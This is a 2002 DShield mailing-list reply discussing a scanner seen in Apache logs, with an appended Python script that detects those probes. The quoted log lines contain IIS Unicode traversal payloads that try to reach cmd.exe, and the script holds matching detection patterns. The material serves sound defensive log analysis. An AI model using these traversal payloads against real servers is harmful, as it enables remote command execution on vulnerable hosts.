[Dshield] Re: Dshield digest, Vol 1 #646 - 2 msgs

checkit checkit at clickdoug.com
Sat Jun 8 02:59:08 GMT 2002


That log file has CodeRed/Nimda all over it - it is looking for check.bat
all over the place.
Are you running apache on a Windows box?

Whatever it is, your system is turning it back with a 404 message.





> Message: 2
> Date: Fri, 7 Jun 2002 21:01:48 -0400
> From: Johannes Ullrich <jullrich at sans.org>
> To: list at dshield.org
> Organization: Euclidian Consulting
> Subject: [Dshield] (new?) IIS 'galaxy' vulnerability scanner ?
> Reply-To: list at dshield.org
>
>
> I had today three people notify me about a new, rather noisy, signature
> they found in their apache logs. Can everyone take a look at their logs
> and see if they find it? I don't think this qualifies as a 'worm' so far.
> It looks a bit too complex and overly redundant. But maybe it is some
> vulnerability scanner.
>
> Note the first Line: 'galaxy_10400.10746'. It looks like a marker someone
> added to the tool.
>
>
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "GET /galaxy_10400.10746 HTTP/1.0" 404 289 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD

<redundancy snipped>
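The quoted probes share two traits a log reviewer can key on: the request paths carry percent-encoded byte pairs (%c0%af, %c0%2f, %c1%1c) that are not well-formed UTF-8, and they all aim at cmd.exe under /winnt/system32. The script below is an added example, not code from either poster or from DShield; it parses Apache log lines in the layout shown above, tags each suspicious request, and counts probes per source host so a burst like the one in the post stands out even when every request was answered with a 404. The log lines embedded in it are constructed to mirror the quoted ones (plus one benign request for contrast), and the tag names and function names are my own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample in the layout of the quoted Apache log: host, ident, user,
# timestamp, request line, status, bytes, then three quoted fields. The first
# four lines mirror the scanner's probes; the last is ordinary traffic.
SAMPLE_LOG = """\
a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "GET /galaxy_10400.10746 HTTP/1.0" 404 289 "-" "-" "-"
a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD /_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
10.0.0.5 - - [06/Jun/2002:15:11:03 +0200] "GET /index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0" "-"
"""

# Fields of the common/combined layout used above.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Percent-encoded byte pairs from the quoted probes: %c0%af and %c0%2f stand in
# for '/', %c1%1c and %c1%9c for '\'. None of them is well-formed UTF-8.
BAD_ENCODED_SEPARATOR = re.compile(r'%c0%(?:2f|af)|%c1%(?:1c|9c)', re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_malformed_utf8(path):
    """True if percent-decoding the path yields bytes a strict UTF-8 decoder rejects."""
    try:
        unquote_to_bytes(path).decode('utf-8')
    except UnicodeDecodeError:
        return True
    return False


def classify(path):
    """Tags describing why a request path is suspicious (empty list for benign paths)."""
    tags = []
    if path.startswith('/galaxy_'):
        tags.append('galaxy-marker')        # the marker line noted in the post
    if BAD_ENCODED_SEPARATOR.search(path):
        tags.append('encoded-separator')    # %c0%af-style path separators
    if is_malformed_utf8(path):
        tags.append('malformed-utf8')       # decoder-level check, catches variants too
    if '..' in path:
        tags.append('traversal')
    lowered = path.lower()
    if 'cmd.exe' in lowered or '/system32/' in lowered:
        tags.append('shell-probe')
    return tags


def analyze(log_text):
    """Return one record per suspicious request: host, time, status, path and tags."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec['path'])
        if tags:
            findings.append({'host': rec['host'], 'time': rec['time'],
                             'status': int(rec['status']), 'path': rec['path'],
                             'tags': tags})
    return findings


def probes_per_host(findings):
    """Count suspicious requests by source host; a burst from one host is a scanner."""
    return Counter(f['host'] for f in findings)


if __name__ == '__main__':
    hits = analyze(SAMPLE_LOG)
    for f in hits:
        print(f"{f['host']} {f['status']} {','.join(f['tags'])} {f['path']}")
    print(dict(probes_per_host(hits)))
```

Run it against a real access log with `analyze(open('access_log').read())`. The regex test for the specific byte pairs and the strict UTF-8 decode overlap on purpose: the former names the exact sequences from the post, while the latter also flags other overlong or truncated encodings that a signature list would miss. Apache on a non-Windows host answers these with 404, as the reply says, so the value of the check is in attributing the source and spotting the burst, not in blocking anything.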




